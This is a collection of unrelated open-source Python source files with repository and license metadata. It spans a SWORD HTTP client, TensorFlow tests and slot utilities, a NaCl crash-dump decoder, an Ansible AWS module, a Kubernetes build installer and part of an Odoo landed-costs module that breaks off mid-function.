JiscPER/magnificent-octopus | octopus/modules/swordv2/client_http.py | 1 | 1816 | from sword2 import HttpLayer, HttpResponse
from octopus.lib import http
import json
from requests.auth import HTTPBasicAuth
class OctopusHttpResponse(HttpResponse):
def __init__(self, *args, **kwargs):
self.resp = None
if len(args) > 0:
self.resp = args[0]
def __getitem__(self, att):
return self.get(att)
def __repr__(self):
return self.resp.__repr__()
@property
def status(self):
if self.resp is None:
return 408 # timeout
return self.resp.status_code
def get(self, att, default=None):
if att == "status":
return self.status
if self.resp is None:
return default
return self.resp.headers.get(att, default)
def keys(self):
return self.resp.headers.keys()
class OctopusHttpLayer(HttpLayer):
def __init__(self, *args, **kwargs):
self.username = None
self.password = None
self.auth = None
def add_credentials(self, username, password):
self.username = username
self.password = password
self.auth = HTTPBasicAuth(username, password)
def request(self, uri, method, headers=None, payload=None): # Note that body can be file-like
resp = None
if method == "GET":
resp = http.get(uri, headers=headers, auth=self.auth)
elif method == "POST":
resp = http.post(uri, headers=headers, data=payload, auth=self.auth)
elif method == "PUT":
resp = http.put(uri, headers=headers, data=payload, auth=self.auth)
elif method == "DELETE":
resp = http.delete(uri, headers=headers, auth=self.auth)
if resp is None:
return OctopusHttpResponse(), u""
return OctopusHttpResponse(resp), resp.text
| apache-2.0 |
awni/tensorflow | tensorflow/python/training/coordinator_test.py | 6 | 4200 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Coordinator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import threading
import time
import tensorflow as tf
def StopInN(coord, n_secs):
time.sleep(n_secs)
coord.request_stop()
def RaiseInN(coord, n_secs, ex, report_exception):
try:
time.sleep(n_secs)
raise ex
except RuntimeError as e:
if report_exception:
coord.request_stop(e)
else:
coord.request_stop(sys.exc_info())
def RaiseInNUsingContextHandler(coord, n_secs, ex):
with coord.stop_on_exception():
time.sleep(n_secs)
raise ex
def SleepABit(n_secs):
time.sleep(n_secs)
class CoordinatorTest(tf.test.TestCase):
def testStopAPI(self):
coord = tf.train.Coordinator()
self.assertFalse(coord.should_stop())
self.assertFalse(coord.wait_for_stop(0.01))
coord.request_stop()
self.assertTrue(coord.should_stop())
self.assertTrue(coord.wait_for_stop(0.01))
def testStopAsync(self):
coord = tf.train.Coordinator()
self.assertFalse(coord.should_stop())
self.assertFalse(coord.wait_for_stop(0.1))
threading.Thread(target=StopInN, args=(coord, 0.02)).start()
self.assertFalse(coord.should_stop())
self.assertFalse(coord.wait_for_stop(0.01))
self.assertTrue(coord.wait_for_stop(0.03))
self.assertTrue(coord.should_stop())
def testJoin(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=SleepABit, args=(0.01,)),
threading.Thread(target=SleepABit, args=(0.02,)),
threading.Thread(target=SleepABit, args=(0.01,))]
for t in threads:
t.start()
coord.join(threads)
def testJoinGraceExpires(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=StopInN, args=(coord, 0.01)),
threading.Thread(target=SleepABit, args=(10.0,))]
for t in threads:
t.daemon = True
t.start()
with self.assertRaisesRegexp(RuntimeError, "threads still running"):
coord.join(threads, stop_grace_period_secs=0.02)
def testJoinRaiseReportExcInfo(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=RaiseInN,
args=(coord, 0.01, RuntimeError("First"), False)),
threading.Thread(target=RaiseInN,
args=(coord, 0.02, RuntimeError("Too late"), False))]
for t in threads:
t.start()
with self.assertRaisesRegexp(RuntimeError, "First"):
coord.join(threads)
def testJoinRaiseReportException(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=RaiseInN,
args=(coord, 0.01, RuntimeError("First"), True)),
threading.Thread(target=RaiseInN,
args=(coord, 0.02, RuntimeError("Too late"), True))]
for t in threads:
t.start()
with self.assertRaisesRegexp(RuntimeError, "First"):
coord.join(threads)
def testJoinRaiseReportExceptionUsingHandler(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=RaiseInNUsingContextHandler,
args=(coord, 0.01, RuntimeError("First"))),
threading.Thread(target=RaiseInNUsingContextHandler,
args=(coord, 0.02, RuntimeError("Too late")))]
for t in threads:
t.start()
with self.assertRaisesRegexp(RuntimeError, "First"):
coord.join(threads)
if __name__ == "__main__":
tf.test.main()
| apache-2.0 |
fujunwei/chromium-crosswalk | native_client_sdk/src/tools/decode_dump.py | 51 | 6717 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Utility to decode a crash dump generated by untrusted_crash_dump.[ch]
Currently this produces a simple stack trace.
"""
import argparse
import json
import os
import posixpath
import subprocess
import sys
class CoreDecoder(object):
"""Class to process core dumps."""
def __init__(self, main_nexe, nmf_filename,
addr2line, library_paths, platform):
"""Construct and object to process core dumps.
Args:
main_nexe: nexe to resolve NaClMain references from.
nmf_filename: nmf to resolve references from.
addr2line: path to appropriate addr2line.
library_paths: list of paths to search for libraries.
platform: platform string to use in nmf files.
"""
self.main_nexe = main_nexe
self.nmf_filename = nmf_filename
if nmf_filename == '-':
self.nmf_data = {}
else:
self.nmf_data = json.load(open(nmf_filename))
self.addr2line = addr2line
self.library_paths = library_paths
self.platform = platform
def _SelectModulePath(self, filename):
"""Select which path to get a module from.
Args:
filename: filename of a module (as appears in phdrs).
Returns:
Full local path to the file.
Derived by consulting the manifest.
"""
# For some names try the main nexe.
# NaClMain is the argv[0] setup in sel_main.c
# (null) shows up in chrome.
if self.main_nexe is not None and filename in ['NaClMain', '(null)']:
return self.main_nexe
filepart = posixpath.basename(filename)
nmf_entry = self.nmf_data.get('files', {}).get(filepart, {})
nmf_url = nmf_entry.get(self.platform, {}).get('url')
# Try filename directly if not in manifest.
if nmf_url is None:
return filename
# Look for the module relative to the manifest (if any),
# then in other search paths.
paths = []
if self.nmf_filename != '-':
paths.append(os.path.dirname(self.nmf_filename))
paths.extend(self.library_paths)
for path in paths:
pfilename = os.path.join(path, nmf_url)
if os.path.exists(pfilename):
return pfilename
# If nothing else, try the path directly.
return filename
def _DecodeAddressSegment(self, segments, address):
"""Convert an address to a segment relative one, plus filename.
Args:
segments: a list of phdr segments.
address: a process wide code address.
Returns:
A tuple of filename and segment relative address.
"""
for segment in segments:
for phdr in segment['dlpi_phdr']:
start = segment['dlpi_addr'] + phdr['p_vaddr']
end = start + phdr['p_memsz']
if address >= start and address < end:
return (segment['dlpi_name'], address - segment['dlpi_addr'])
return ('(null)', address)
def _Addr2Line(self, segments, address):
"""Use addr2line to decode a code address.
Args:
segments: A list of phdr segments.
address: a code address.
Returns:
A list of dicts containing: function, filename, lineno.
"""
filename, address = self._DecodeAddressSegment(segments, address)
filename = self._SelectModulePath(filename)
if not os.path.exists(filename):
return [{
'function': 'Unknown_function',
'filename': 'unknown_file',
'lineno': -1,
}]
# Use address - 1 to get the call site instead of the line after.
address -= 1
cmd = [
self.addr2line, '-f', '--inlines', '-e', filename, '0x%08x' % address,
]
process = subprocess.Popen(cmd, stdout=subprocess.PIPE)
process_stdout, _ = process.communicate()
assert process.returncode == 0
lines = process_stdout.splitlines()
assert len(lines) % 2 == 0
results = []
for index in xrange(len(lines) / 2):
func = lines[index * 2]
afilename, lineno = lines[index * 2 + 1].split(':', 1)
results.append({
'function': func,
'filename': afilename,
'lineno': int(lineno),
})
return results
def Decode(self, text):
core = json.loads(text)
for frame in core['frames']:
frame['scopes'] = self._Addr2Line(core['segments'], frame['prog_ctr'])
return core
def LoadAndDecode(self, core_path):
"""Given a core.json file, load and embellish with decoded addresses.
Args:
core_path: source file containing a dump.
Returns:
An embellished core dump dict (decoded code addresses).
"""
core = json.load(open(core_path))
for frame in core['frames']:
frame['scopes'] = self._Addr2Line(core['segments'], frame['prog_ctr'])
return core
def StackTrace(self, info):
"""Convert a decoded core.json dump to a simple stack trace.
Args:
info: core.json info with decoded code addresses.
Returns:
A list of dicts with filename, lineno, function (deepest first).
"""
trace = []
for frame in info['frames']:
for scope in frame['scopes']:
trace.append(scope)
return trace
def PrintTrace(self, trace, out):
"""Print a trace to a file like object.
Args:
trace: A list of [filename, lineno, function] (deepest first).
out: file like object to output the trace to.
"""
for scope in trace:
out.write('%s at %s:%d\n' % (
scope['function'],
scope['filename'],
scope['lineno']))
def main(args):
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('-m', '--main-nexe',
help='nexe to resolve NaClMain references from')
parser.add_argument('-n', '--nmf', default='-',
help='nmf to resolve references from')
parser.add_argument('-a', '--addr2line',
help='path to appropriate addr2line')
parser.add_argument('-L', '--library-path', dest='library_paths',
action='append', default=[],
help='path to search for shared libraries')
parser.add_argument('-p', '--platform',
help='platform in a style match nmf files')
parser.add_argument('core_json')
options = parser.parse_args(args)
decoder = CoreDecoder(
main_nexe=options.main_nexe,
nmf_filename=options.nmf,
addr2line=options.addr2line,
library_paths=options.library_paths,
platform=options.platform)
info = decoder.LoadAndDecode(options.core_json)
trace = decoder.StackTrace(info)
decoder.PrintTrace(trace, sys.stdout)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
| bsd-3-clause |
apollo13/ansible | test/support/integration/plugins/modules/aws_step_functions_state_machine_execution.py | 27 | 6479 | #!/usr/bin/python
# Copyright (c) 2019, Prasad Katti (@prasadkatti)
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: aws_step_functions_state_machine_execution
short_description: Start or stop execution of an AWS Step Functions state machine.
version_added: "2.10"
description:
- Start or stop execution of a state machine in AWS Step Functions.
options:
action:
description: Desired action (start or stop) for a state machine execution.
default: start
choices: [ start, stop ]
type: str
name:
description: Name of the execution.
type: str
execution_input:
description: The JSON input data for the execution.
type: json
default: {}
state_machine_arn:
description: The ARN of the state machine that will be executed.
type: str
execution_arn:
description: The ARN of the execution you wish to stop.
type: str
cause:
description: A detailed explanation of the cause for stopping the execution.
type: str
default: ''
error:
description: The error code of the failure to pass in when stopping the execution.
type: str
default: ''
extends_documentation_fragment:
- aws
- ec2
author:
- Prasad Katti (@prasadkatti)
'''
EXAMPLES = '''
- name: Start an execution of a state machine
aws_step_functions_state_machine_execution:
name: an_execution_name
execution_input: '{ "IsHelloWorldExample": true }'
state_machine_arn: "arn:aws:states:us-west-2:682285639423:stateMachine:HelloWorldStateMachine"
- name: Stop an execution of a state machine
aws_step_functions_state_machine_execution:
action: stop
execution_arn: "arn:aws:states:us-west-2:682285639423:execution:HelloWorldStateMachineCopy:a1e8e2b5-5dfe-d40e-d9e3-6201061047c8"
cause: "cause of task failure"
error: "error code of the failure"
'''
RETURN = '''
execution_arn:
description: ARN of the AWS Step Functions state machine execution.
type: str
returned: if action == start and changed == True
sample: "arn:aws:states:us-west-2:682285639423:execution:HelloWorldStateMachineCopy:a1e8e2b5-5dfe-d40e-d9e3-6201061047c8"
start_date:
description: The date the execution is started.
type: str
returned: if action == start and changed == True
sample: "2019-11-02T22:39:49.071000-07:00"
stop_date:
description: The date the execution is stopped.
type: str
returned: if action == stop
sample: "2019-11-02T22:39:49.071000-07:00"
'''
from ansible.module_utils.aws.core import AnsibleAWSModule
from ansible.module_utils.ec2 import camel_dict_to_snake_dict
try:
from botocore.exceptions import ClientError, BotoCoreError
except ImportError:
pass # caught by AnsibleAWSModule
def start_execution(module, sfn_client):
'''
start_execution uses execution name to determine if a previous execution already exists.
If an execution by the provided name exists, call client.start_execution will not be called.
'''
state_machine_arn = module.params.get('state_machine_arn')
name = module.params.get('name')
execution_input = module.params.get('execution_input')
try:
# list_executions is eventually consistent
page_iterators = sfn_client.get_paginator('list_executions').paginate(stateMachineArn=state_machine_arn)
for execution in page_iterators.build_full_result()['executions']:
if name == execution['name']:
check_mode(module, msg='State machine execution already exists.', changed=False)
module.exit_json(changed=False)
check_mode(module, msg='State machine execution would be started.', changed=True)
res_execution = sfn_client.start_execution(
stateMachineArn=state_machine_arn,
name=name,
input=execution_input
)
except (ClientError, BotoCoreError) as e:
if e.response['Error']['Code'] == 'ExecutionAlreadyExists':
# this will never be executed anymore
module.exit_json(changed=False)
module.fail_json_aws(e, msg="Failed to start execution.")
module.exit_json(changed=True, **camel_dict_to_snake_dict(res_execution))
def stop_execution(module, sfn_client):
cause = module.params.get('cause')
error = module.params.get('error')
execution_arn = module.params.get('execution_arn')
try:
# describe_execution is eventually consistent
execution_status = sfn_client.describe_execution(executionArn=execution_arn)['status']
if execution_status != 'RUNNING':
check_mode(module, msg='State machine execution is not running.', changed=False)
module.exit_json(changed=False)
check_mode(module, msg='State machine execution would be stopped.', changed=True)
res = sfn_client.stop_execution(
executionArn=execution_arn,
cause=cause,
error=error
)
except (ClientError, BotoCoreError) as e:
module.fail_json_aws(e, msg="Failed to stop execution.")
module.exit_json(changed=True, **camel_dict_to_snake_dict(res))
def check_mode(module, msg='', changed=False):
if module.check_mode:
module.exit_json(changed=changed, output=msg)
def main():
module_args = dict(
action=dict(choices=['start', 'stop'], default='start'),
name=dict(type='str'),
execution_input=dict(type='json', default={}),
state_machine_arn=dict(type='str'),
cause=dict(type='str', default=''),
error=dict(type='str', default=''),
execution_arn=dict(type='str')
)
module = AnsibleAWSModule(
argument_spec=module_args,
required_if=[('action', 'start', ['name', 'state_machine_arn']),
('action', 'stop', ['execution_arn']),
],
supports_check_mode=True
)
sfn_client = module.client('stepfunctions')
action = module.params.get('action')
if action == "start":
start_execution(module, sfn_client)
else:
stop_execution(module, sfn_client)
if __name__ == '__main__':
main()
| gpl-3.0 |
nburn42/tensorflow | tensorflow/python/training/slot_creator.py | 16 | 7900 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Standard functions for creating slots.
A slot is a `Variable` created with the same shape as a primary variable or
`Tensor`. A slot is always scoped in the namespace of the primary object and
typically has the same device and type.
Slots are typically used as accumulators to track values associated with
the primary object:
```python
# Optimizers can create a slot for each variable to track accumulators
accumulators = {var : create_zeros_slot(var, "momentum") for var in vs}
for var in vs:
apply_momentum(var, accumulators[var], lr, grad, momentum_tensor)
# Slots can also be used for moving averages
mavg = create_slot(var, var.initialized_value(), "exponential_moving_avg")
update_mavg = mavg.assign_sub((mavg - var) * (1 - decay))
```
"""
# pylint: disable=g-bad-name
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.eager import context
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.training import distribute as distribute_lib
def _create_slot_var(primary, val, scope, validate_shape, shape, dtype):
"""Helper function for creating a slot variable."""
# TODO(lukaszkaiser): Consider allowing partitioners to be set in the current
# scope.
current_partitioner = variable_scope.get_variable_scope().partitioner
variable_scope.get_variable_scope().set_partitioner(None)
# When init from val instead of callable initializer, the shape is expected to
# be None, not <unknown> or any fully defined shape.
shape = shape if callable(val) else None
slot = variable_scope.get_variable(
scope, initializer=val, trainable=False,
use_resource=resource_variable_ops.is_resource_variable(primary),
shape=shape, dtype=dtype,
validate_shape=validate_shape)
variable_scope.get_variable_scope().set_partitioner(current_partitioner)
# pylint: disable=protected-access
if isinstance(primary, variables.Variable) and primary._save_slice_info:
# Primary is a partitioned variable, so we need to also indicate that
# the slot is a partitioned variable. Slots have the same partitioning
# as their primaries.
# For examples when using AdamOptimizer in linear model, slot.name
# here can be "linear//weights/Adam:0", while primary.op.name is
# "linear//weight". We want to get 'Adam' as real_slot_name, so we
# remove "'linear//weight' + '/'" and ':0'.
real_slot_name = slot.name[len(primary.op.name + "/"):-2]
slice_info = primary._save_slice_info
slot._set_save_slice_info(variables.Variable.SaveSliceInfo(
slice_info.full_name + "/" + real_slot_name,
slice_info.full_shape[:],
slice_info.var_offset[:],
slice_info.var_shape[:]))
# pylint: enable=protected-access
return slot
def create_slot(primary, val, name, colocate_with_primary=True):
"""Create a slot initialized to the given value.
The type of the slot is determined by the given value.
Args:
primary: The primary `Variable` or `Tensor`.
val: A `Tensor` specifying the initial value of the slot.
name: Name to use for the slot variable.
colocate_with_primary: Boolean. If True the slot is located
on the same device as `primary`.
Returns:
A `Variable` object.
"""
# Scope the slot name in the namespace of the primary variable.
# Set "primary.op.name + '/' + name" as default name, so the scope name of
# optimizer can be shared when reuse is True. Meanwhile when reuse is False
# and the same name has been previously used, the scope name will add '_N'
# as suffix for unique identifications.
validate_shape = val.get_shape().is_fully_defined()
if context.executing_eagerly():
prefix = primary._shared_name # pylint: disable=protected-access
else:
prefix = primary.op.name
with variable_scope.variable_scope(None, prefix + "/" + name):
if colocate_with_primary:
distribution_strategy = distribute_lib.get_distribution_strategy()
with distribution_strategy.colocate_vars_with(primary):
return _create_slot_var(primary, val, "", validate_shape, None, None)
else:
return _create_slot_var(primary, val, "", validate_shape, None, None)
def create_slot_with_initializer(primary, initializer, shape, dtype, name,
colocate_with_primary=True):
"""Creates a slot initialized using an `Initializer`.
The type of the slot is determined by the given value.
Args:
primary: The primary `Variable` or `Tensor`.
initializer: An `Initializer`. The initial value of the slot.
shape: Shape of the initial value of the slot.
dtype: Type of the value of the slot.
name: Name to use for the slot variable.
colocate_with_primary: Boolean. If True the slot is located
on the same device as `primary`.
Returns:
A `Variable` object.
"""
# Scope the slot name in the namespace of the primary variable.
# Set "primary.op.name + '/' + name" as default name, so the scope name of
# optimizer can be shared when reuse is True. Meanwhile when reuse is False
# and the same name has been previously used, the scope name will add '_N'
# as suffix for unique identifications.
validate_shape = shape.is_fully_defined()
if context.executing_eagerly():
prefix = primary._shared_name # pylint: disable=protected-access
else:
prefix = primary.op.name
with variable_scope.variable_scope(None, prefix + "/" + name):
if colocate_with_primary:
distribution_strategy = distribute_lib.get_distribution_strategy()
with distribution_strategy.colocate_vars_with(primary):
return _create_slot_var(primary, initializer, "", validate_shape, shape,
dtype)
else:
return _create_slot_var(primary, initializer, "", validate_shape, shape,
dtype)
def create_zeros_slot(primary, name, dtype=None, colocate_with_primary=True):
"""Create a slot initialized to 0 with same shape as the primary object.
Args:
primary: The primary `Variable` or `Tensor`.
name: Name to use for the slot variable.
dtype: Type of the slot variable. Defaults to the type of `primary`.
colocate_with_primary: Boolean. If True the slot is located
on the same device as `primary`.
Returns:
A `Variable` object.
"""
if dtype is None:
dtype = primary.dtype
slot_shape = primary.get_shape()
if slot_shape.is_fully_defined():
initializer = init_ops.zeros_initializer(dtype)
return create_slot_with_initializer(
primary, initializer, slot_shape, dtype, name,
colocate_with_primary=colocate_with_primary)
else:
if isinstance(primary, variables.Variable):
slot_shape = array_ops.shape(primary.initialized_value())
else:
slot_shape = array_ops.shape(primary)
val = array_ops.zeros(slot_shape, dtype=dtype)
return create_slot(primary, val, name,
colocate_with_primary=colocate_with_primary)
| apache-2.0 |
qma/pants | tests/python/pants_test/java/jar/test_manifest.py | 33 | 1127 | # coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import unittest
from pants.java.jar.manifest import Manifest
class TestManifest(unittest.TestCase):
def test_isempty(self):
manifest = Manifest()
self.assertTrue(manifest.is_empty())
manifest.addentry('Header', 'value')
self.assertFalse(manifest.is_empty())
def test_addentry(self):
manifest = Manifest()
manifest.addentry('Header', 'value')
self.assertEquals(
'Header: value\n', manifest.contents())
def test_too_long_entry(self):
manifest = Manifest()
with self.assertRaises(ValueError):
manifest.addentry(
'1234567890123456789012345678901234567890'
'12345678901234567890123456789', 'value')
def test_nonascii_char(self):
manifest = Manifest()
with self.assertRaises(UnicodeEncodeError):
manifest.addentry('X-Copyright', '© 2015')
| apache-2.0 |
mylons/kubernetes | cluster/juju/charms/trusty/kubernetes-master/hooks/kubernetes_installer.py | 149 | 4138 | #!/usr/bin/env python
# Copyright 2015 The Kubernetes Authors All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import shlex
import subprocess
from path import Path
def run(command, shell=False):
""" A convience method for executing all the commands. """
print(command)
if shell is False:
command = shlex.split(command)
output = subprocess.check_output(command, shell=shell)
print(output)
return output
class KubernetesInstaller():
"""
This class contains the logic needed to install kuberentes binary files.
"""
def __init__(self, arch, version, output_dir):
""" Gather the required variables for the install. """
# The kubernetes-master charm needs certain commands to be aliased.
self.aliases = {'kube-apiserver': 'apiserver',
'kube-controller-manager': 'controller-manager',
'kube-proxy': 'kube-proxy',
'kube-scheduler': 'scheduler',
'kubectl': 'kubectl',
'kubelet': 'kubelet'}
self.arch = arch
self.version = version
self.output_dir = Path(output_dir)
def build(self, branch):
""" Build kubernetes from a github repository using the Makefile. """
# Remove any old build artifacts.
make_clean = 'make clean'
run(make_clean)
# Always checkout the master to get the latest repository information.
git_checkout_cmd = 'git checkout master'
run(git_checkout_cmd)
# When checking out a tag, delete the old branch (not master).
if branch != 'master':
git_drop_branch = 'git branch -D {0}'.format(self.version)
print(git_drop_branch)
rc = subprocess.call(git_drop_branch.split())
if rc != 0:
print('returned: %d' % rc)
# Make sure the git repository is up-to-date.
git_fetch = 'git fetch origin {0}'.format(branch)
run(git_fetch)
if branch == 'master':
git_reset = 'git reset --hard origin/master'
run(git_reset)
else:
# Checkout a branch of kubernetes so the repo is correct.
checkout = 'git checkout -b {0} {1}'.format(self.version, branch)
run(checkout)
# Create an environment with the path to the GO binaries included.
go_path = ('/usr/local/go/bin', os.environ.get('PATH', ''))
go_env = os.environ.copy()
go_env['PATH'] = ':'.join(go_path)
print(go_env['PATH'])
# Compile the binaries with the make command using the WHAT variable.
make_what = "make all WHAT='cmd/kube-apiserver cmd/kubectl "\
"cmd/kube-controller-manager plugin/cmd/kube-scheduler "\
"cmd/kubelet cmd/kube-proxy'"
print(make_what)
rc = subprocess.call(shlex.split(make_what), env=go_env)
def install(self, install_dir=Path('/usr/local/bin')):
""" Install kubernetes binary files from the output directory. """
if not install_dir.isdir():
install_dir.makedirs_p()
# Create the symbolic links to the real kubernetes binaries.
for key, value in self.aliases.iteritems():
target = self.output_dir / key
if target.exists():
link = install_dir / value
if link.exists():
link.remove()
target.symlink(link)
else:
print('Error target file {0} does not exist.'.format(target))
exit(1)
| apache-2.0 |
ubiar/odoo | addons/stock_landed_costs/stock_landed_costs.py | 56 | 18361 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
import openerp.addons.decimal_precision as dp
from openerp.tools.translate import _
import product
class stock_landed_cost(osv.osv):
_name = 'stock.landed.cost'
_description = 'Stock Landed Cost'
_inherit = 'mail.thread'
_track = {
'state': {
'stock_landed_costs.mt_stock_landed_cost_open': lambda self, cr, uid, obj, ctx=None: obj['state'] == 'done',
},
}
def _total_amount(self, cr, uid, ids, name, args, context=None):
result = {}
for cost in self.browse(cr, uid, ids, context=context):
total = 0.0
for line in cost.cost_lines:
total += line.price_unit
result[cost.id] = total
return result
def _get_cost_line(self, cr, uid, ids, context=None):
cost_to_recompute = []
for line in self.pool.get('stock.landed.cost.lines').browse(cr, uid, ids, context=context):
cost_to_recompute.append(line.cost_id.id)
return cost_to_recompute
def get_valuation_lines(self, cr, uid, ids, picking_ids=None, context=None):
picking_obj = self.pool.get('stock.picking')
lines = []
if not picking_ids:
return lines
for picking in picking_obj.browse(cr, uid, picking_ids):
for move in picking.move_lines:
#it doesn't make sense to make a landed cost for a product that isn't set as being valuated in real time at real cost
if move.product_id.valuation != 'real_time' or move.product_id.cost_method != 'real':
continue
total_cost = 0.0
total_qty = move.product_qty
weight = move.product_id and move.product_id.weight * move.product_qty
volume = move.product_id and move.product_id.volume * move.product_qty
for quant in move.quant_ids:
total_cost += quant.cost
vals = dict(product_id=move.product_id.id, move_id=move.id, quantity=move.product_uom_qty, former_cost=total_cost * total_qty, weight=weight, volume=volume)
lines.append(vals)
if not lines:
raise osv.except_osv(_('Error!'), _('The selected picking does not contain any move that would be impacted by landed costs. Landed costs are only possible for products configured in real time valuation with real price costing method. Please make sure it is the case, or you selected the correct picking'))
return lines
_columns = {
'name': fields.char('Name', track_visibility='always', readonly=True, copy=False),
'date': fields.date('Date', required=True, states={'done': [('readonly', True)]}, track_visibility='onchange', copy=False),
'picking_ids': fields.many2many('stock.picking', string='Pickings', states={'done': [('readonly', True)]}, copy=False),
'cost_lines': fields.one2many('stock.landed.cost.lines', 'cost_id', 'Cost Lines', states={'done': [('readonly', True)]}, copy=True),
'valuation_adjustment_lines': fields.one2many('stock.valuation.adjustment.lines', 'cost_id', 'Valuation Adjustments', states={'done': [('readonly', True)]}),
'description': fields.text('Item Description', states={'done': [('readonly', True)]}),
'amount_total': fields.function(_total_amount, type='float', string='Total', digits_compute=dp.get_precision('Account'),
store={
'stock.landed.cost': (lambda self, cr, uid, ids, c={}: ids, ['cost_lines'], 20),
'stock.landed.cost.lines': (_get_cost_line, ['price_unit', 'quantity', 'cost_id'], 20),
}, track_visibility='always'
),
'state': fields.selection([('draft', 'Draft'), ('done', 'Posted'), ('cancel', 'Cancelled')], 'State', readonly=True, track_visibility='onchange', copy=False),
'account_move_id': fields.many2one('account.move', 'Journal Entry', readonly=True, copy=False),
'account_journal_id': fields.many2one('account.journal', 'Account Journal', required=True),
}
_defaults = {
'name': lambda obj, cr, uid, context: obj.pool.get('ir.sequence').get(cr, uid, 'stock.landed.cost'),
'state': 'draft',
'date': fields.date.context_today,
}
def _create_accounting_entries(self, cr, uid, line, move_id, qty_out, context=None):
product_obj = self.pool.get('product.template')
cost_product = line.cost_line_id and line.cost_line_id.product_id
if not cost_product:
return False
accounts = product_obj.get_product_accounts(cr, uid, line.product_id.product_tmpl_id.id, context=context)
debit_account_id = accounts['property_stock_valuation_account_id']
already_out_account_id = accounts['stock_account_output']
credit_account_id = line.cost_line_id.account_id.id or cost_product.property_account_expense.id or cost_product.categ_id.property_account_expense_categ.id
if not credit_account_id:
raise osv.except_osv(_('Error!'), _('Please configure Stock Expense Account for product: %s.') % (cost_product.name))
return self._create_account_move_line(cr, uid, line, move_id, credit_account_id, debit_account_id, qty_out, already_out_account_id, context=context)
def _create_account_move_line(self, cr, uid, line, move_id, credit_account_id, debit_account_id, qty_out, already_out_account_id, context=None):
"""
Generate the account.move.line values to track the landed cost.
Afterwards, for the goods that are already out of stock, we should create the out moves
"""
aml_obj = self.pool.get('account.move.line')
aml_obj.create(cr, uid, {
'name': line.name,
'move_id': move_id,
'product_id': line.product_id.id,
'quantity': line.quantity,
'debit': line.additional_landed_cost,
'account_id': debit_account_id
}, context=context)
aml_obj.create(cr, uid, {
'name': line.name,
'move_id': move_id,
'product_id': line.product_id.id,
'quantity': line.quantity,
'credit': line.additional_landed_cost,
'account_id': credit_account_id
}, context=context)
#Create account move lines for quants already out of stock
if qty_out > 0:
aml_obj.create(cr, uid, {
'name': line.name + ": " + str(qty_out) + _(' already out'),
'move_id': move_id,
'product_id': line.product_id.id,
'quantity': qty_out,
'credit': line.additional_landed_cost * qty_out / line.quantity,
'account_id': debit_account_id
}, context=context)
aml_obj.create(cr, uid, {
'name': line.name + ": " + str(qty_out) + _(' already out'),
'move_id': move_id,
'product_id': line.product_id.id,
'quantity': qty_out,
'debit': line.additional_landed_cost * qty_out / line.quantity,
'account_id': already_out_account_id
}, context=context)
return True
def _create_account_move(self, cr, uid, cost, context=None):
vals = {
'journal_id': cost.account_journal_id.id,
'period_id': self.pool.get('account.period').find(cr, uid, cost.date, context=context)[0],
'date': cost.date,
'ref': cost.name
}
return self.pool.get('account.move').create(cr, uid, vals, context=context)
def _check_sum(self, cr, uid, landed_cost, context=None):
"""
Will check if each cost line its valuation lines sum to the correct amount
and if the overall total amount is correct also
"""
costcor = {}
tot = 0
for valuation_line in landed_cost.valuation_adjustment_lines:
if costcor.get(valuation_line.cost_line_id):
costcor[valuation_line.cost_line_id] += valuation_line.additional_landed_cost
else:
